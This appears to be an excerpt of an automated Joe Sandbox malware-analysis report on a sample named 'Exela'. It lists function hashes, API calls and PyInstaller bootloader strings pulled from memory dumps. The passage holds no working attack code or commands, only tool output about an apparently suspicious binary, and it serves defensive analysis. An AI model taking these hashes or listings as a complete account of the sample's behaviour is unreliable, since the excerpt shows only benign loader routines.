                                                                                                                                                                                                                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                            • API String ID: 190572456-2208601799
                                                                                                                                                                                                                                                            • Opcode ID: d06a92813886bac4db22892db141582495630975dbcfbb846e36d04df9038670
                                                                                                                                                                                                                                                            • Instruction ID: 59da26bf9b6eb1cd4700fe9aa93ccf9acfcb7f868be844b3261fe4bbe0bce4ac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d06a92813886bac4db22892db141582495630975dbcfbb846e36d04df9038670
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48E10B63B1DB43C0FA548B0CF85A774BBA5AF45781B841531C80EA6664EF7FE5C8870A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message_fread_nolock
                                                                                                                                                                                                                                                            • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 3065259568-2316137593
                                                                                                                                                                                                                                                            • Opcode ID: c14058ae9eb68ad52eb665bed56b0a32c9fb61598a334a6ba59ef16f67083324
                                                                                                                                                                                                                                                            • Instruction ID: a8019c8974b188e51e0ef7c543ce17d2ffc0a933066b36db563b4018095473c2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c14058ae9eb68ad52eb665bed56b0a32c9fb61598a334a6ba59ef16f67083324
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8151C663B1868346EA20E71DA8563FA7B90EF447C4F404031EE4DE7B95EE7EE4818749
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                            • Opcode ID: 4ec0923ad57b9e26d950b98539eabaaac0ee0779749769c2f3ee915382542b09
                                                                                                                                                                                                                                                            • Instruction ID: 8b6a7bf54534795c35e092e5dfa49b691f28b60b70e28f47f5541f010fea80b3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ec0923ad57b9e26d950b98539eabaaac0ee0779749769c2f3ee915382542b09
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1351F8266147A186D6349F3AB01C2BABBA1F798B61F004121EBDF83A94DF3DD085DB14
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF6E3A62A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A6101D), ref: 00007FF6E3A68587
                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32 ref: 00007FF6E3A685B6
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF6E3A6860C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A629C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E3A688E2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A6101D), ref: 00007FF6E3A629F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A629C0: MessageBoxW.USER32 ref: 00007FF6E3A62AD0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                                                            • API String ID: 2920928814-2573406579
                                                                                                                                                                                                                                                            • Opcode ID: 341253ed490ea0d4c0f2cc2c63e3841e2b0994626e2ed60ed720fa43fab6ebbb
                                                                                                                                                                                                                                                            • Instruction ID: bbff6c8a450299a73d05f8567774affe005486781e0f185b2492a46e0b09c122
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 341253ed490ea0d4c0f2cc2c63e3841e2b0994626e2ed60ed720fa43fab6ebbb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3021A473B18A8282F7209B1DE85A7797B65FF88388F840135D54DE26A4EF3DD0858709
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                            • Opcode ID: c2e3e1b204f81d5d3111ec2c6225d8aa08a7090ee70090e6a6c227d1fd7f1b68
                                                                                                                                                                                                                                                            • Instruction ID: 17da4fcc402a3d95fccc08086f4d3d8a167aac4eee9231a44691cd035a93743b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2e3e1b204f81d5d3111ec2c6225d8aa08a7090ee70090e6a6c227d1fd7f1b68
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E12A323B0C14386FB249B18D19677A7E61EB80750F954035EA99A76DCDF3FE4C08B4A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                            • Opcode ID: f25701e18b7e3b768cc97be4ad67ee6babc8222917340eb79faa42be88ba5edf
                                                                                                                                                                                                                                                            • Instruction ID: 7fb1c2b705fd5ef7511730d96c65099b78506aeba66e31943b8c25f9a5458c31
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f25701e18b7e3b768cc97be4ad67ee6babc8222917340eb79faa42be88ba5edf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A812A463F0C14386FB205B58D09A7B97AE1FB80754F984131E699966CCDF3EE4C48B0A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                            • Opcode ID: e2505dbd1ef0bd92206aebc3c7944d0c2eb810815010786015b7292929e8a3f9
                                                                                                                                                                                                                                                            • Instruction ID: 3526286d55ca32c1f124420f0d0aaab88cd017cf4e875c61b5551b652e0a711d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2505dbd1ef0bd92206aebc3c7944d0c2eb810815010786015b7292929e8a3f9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE31D727B5864342FA20DB1DA4427BABF61EF047C4F444431DE4DA7A95EE3EE481870A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                            • Opcode ID: aa0254fa6ad752d1b0b3ebb90ffce52311fa0a6dd2bc18c7a97eb297d781420a
                                                                                                                                                                                                                                                            • Instruction ID: a361eacf08295d33cce5b05f0b4998677ca4a0aa4e8107be397f99b2434ed4e2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa0254fa6ad752d1b0b3ebb90ffce52311fa0a6dd2bc18c7a97eb297d781420a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDD19E73A2874286EB249F6D94423AD7BA0FF55788F000135EA8DA7B95DF39E481C706
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A6101D), ref: 00007FF6E3A68837
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A6101D), ref: 00007FF6E3A6888E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                            • API String ID: 626452242-27947307
                                                                                                                                                                                                                                                            • Opcode ID: da25680c1af6adbbd75f9aaa9149da67c4ccf9ada2fcee16a4d67ff34c50752a
                                                                                                                                                                                                                                                            • Instruction ID: d2763e28b28cdb662c4282c77cf11368f0e7a365430c5f0ce81cff369d32b900
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da25680c1af6adbbd75f9aaa9149da67c4ccf9ada2fcee16a4d67ff34c50752a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0041E433B18B8282E620CF1DB84123ABBA9FB84794F544135DA8D93B98DF3DD095C709
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6E3A639CA), ref: 00007FF6E3A68D21
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A629C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E3A688E2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A6101D), ref: 00007FF6E3A629F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A629C0: MessageBoxW.USER32 ref: 00007FF6E3A62AD0
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6E3A639CA), ref: 00007FF6E3A68D95
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                                                                                                                            • Opcode ID: 24e20b950f9c341c4949047225b46873ae1dde5e69406ebada3fd8935fcb2f41
                                                                                                                                                                                                                                                            • Instruction ID: 3ee3426f5fd9069424eeff4b3ed81ec8fa4a16f6e59a04855530093da5fde2f6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24e20b950f9c341c4949047225b46873ae1dde5e69406ebada3fd8935fcb2f41
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC21CE63B18B82C5FB10DB1DE8422B8BA65EB94B84F444235CA0DA3795EF3DE4848309
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                                                                                                                            • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                                                                                                                            • API String ID: 3231891352-3501660386
                                                                                                                                                                                                                                                            • Opcode ID: 4c6ddb2e3a4fe68cd8d5f6e5aed8835ae84ced7ec56702d75cd6e29471abe75a
                                                                                                                                                                                                                                                            • Instruction ID: c073914165b981bb17736dda84f120cf09a8442f359a5439f12aaea482cd756f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c6ddb2e3a4fe68cd8d5f6e5aed8835ae84ced7ec56702d75cd6e29471abe75a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3551E567F3D64341FA109B2D95437B97A959F85B80F440030E90EE77DAEE2FE480834A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E3A62A9B), ref: 00007FF6E3A68C0A
                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6E3A679A1,00000000,?,00000000,00000000,?,00007FF6E3A6153F), ref: 00007FF6E3A6747F
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A62B10: MessageBoxW.USER32 ref: 00007FF6E3A62BE5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6E3A674DA
                                                                                                                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6E3A67493
                                                                                                                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6E3A67456
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                                                            • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                                                            • Opcode ID: 8743f48341130adb83b05e1f6ce01007e671de32885b94e340be128834149e90
                                                                                                                                                                                                                                                            • Instruction ID: f25ef969ae2e0fb0b44e5647e60050bf4567ba371631e2a64e66db1ac097dfe0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8743f48341130adb83b05e1f6ce01007e671de32885b94e340be128834149e90
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0031EB13B3978241FA20D72DD51B3B96A51AF987C0F440431DA4FE27D6ED2FE184870A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
